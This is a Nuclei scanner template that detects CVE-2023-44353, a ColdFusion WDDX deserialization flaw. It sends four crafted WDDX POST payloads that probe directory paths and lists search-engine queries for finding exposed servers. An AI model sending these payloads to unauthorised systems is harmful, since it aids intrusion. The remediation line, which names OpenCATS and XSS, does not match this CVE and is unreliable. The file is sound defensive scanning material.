nuclei-templates/http/cves/2023/CVE-2023-44353.yaml

id: CVE-2023-44353

info:
  name: Adobe ColdFusion WDDX Deserialization Gadgets
  author: salts
  severity: critical
  description: |
    Adobe ColdFusion versions 2023.5 (and earlier) and 2021.11 (and earlier) are affected by an Deserialization of Untrusted Data vulnerability that could result in Arbitrary code execution. Exploitation of this issue does not require user interaction.    
  remediation: |
    To mitigate this vulnerability, it is recommended to apply the latest security patches or upgrade to a newer version of OpenCATS that addresses the XSS vulnerability.    
  reference:
    - https://nvd.nist.gov/vuln/detail/CVE-2023-44353
    - https://helpx.adobe.com/security/products/coldfusion/apsb23-52.html
    - https://research.nccgroup.com/2023/11/21/technical-advisory-adobe-coldfusion-wddx-deserialization-gadgets/#coldfusion-wddx.py
    - https://github.com/JC175/CVE-2023-44353-Nuclei-Template
    - https://github.com/nomi-sec/PoC-in-GitHub
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2023-44353
    cwe-id: CWE-502
    epss-score: 0.00412
    epss-percentile: 0.73869
    cpe: cpe:2.3:a:adobe:coldfusion:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 4
    vendor: adobe
    product: coldfusion
    shodan-query:
      - http.component:"Adobe ColdFusion"
      - http.component:"adobe coldfusion"
      - http.title:"coldfusion administrator login"
      - cpe:"cpe:2.3:a:adobe:coldfusion"
    fofa-query:
      - title="coldfusion administrator login"
      - app="adobe-coldfusion"
    google-query: intitle:"coldfusion administrator login"
  tags: cve2023,cve,adobe,coldfusion,deserialization,xss
variables:
  windows_known_path: "C:\\Windows\\"
  windows_bad_path: "C:\\Thisdefinitelydoesnotexist\\"
  linux_known_path: "/etc/"
  linux_bad_path: "/thesecretcowlevelisreal/"

http:
  - raw:
      - |
        POST /CFIDE/wizards/common/utils.cfc?method=wizardHash%20inPassword=bar%20_cfclient=true HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        argumentCollection=<wddxPacket+version='1.0'><header/><data><struct+type='acoldfusion.tagext.io.cache.CacheTaga'><var+name='directory'><string>{{windows_known_path}}</string></var></struct></data></wddxPacket>        

      - |
        POST /CFIDE/wizards/common/utils.cfc?method=wizardHash%20inPassword=bar%20_cfclient=true HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        argumentCollection=<wddxPacket+version='1.0'><header/><data><struct+type='acoldfusion.tagext.io.cache.CacheTaga'><var+name='directory'><string>{{windows_bad_path}}</string></var></struct></data></wddxPacket>        

      - |
        POST /CFIDE/wizards/common/utils.cfc?method=wizardHash%20inPassword=bar%20_cfclient=true HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        argumentCollection=<wddxPacket+version='1.0'><header/><data><struct+type='acoldfusion.tagext.io.cache.CacheTaga'><var+name='directory'><string>{{linux_known_path}}</string></var></struct></data></wddxPacket>        

      - |
        POST /CFIDE/wizards/common/utils.cfc?method=wizardHash%20inPassword=bar%20_cfclient=true HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        argumentCollection=<wddxPacket+version='1.0'><header/><data><struct+type='acoldfusion.tagext.io.cache.CacheTaga'><var+name='directory'><string>{{linux_bad_path}}</string></var></struct></data></wddxPacket>        

    matchers-condition: or
    matchers:
      - type: dsl
        name: windows
        dsl:
          - "status_code_1 == 500 && status_code_2 == 404"
          - contains(body_1, "coldfusion.runtime")
        condition: and

      - type: dsl
        name: linux
        dsl:
          - "status_code_3 == 500 && status_code_4 == 404"
          - contains(body_3, "coldfusion.runtime")
        condition: and
# digest: 490a00463044022016552548b902a20941bf3b8f74c6bb4168571b335e98fde72738a6b91f4bf39f02200c0098761471880e51ff1a9325790c071def7853d7c548302d5bb84f5178d7ff:922c64590222798bb761d5b6d8e72950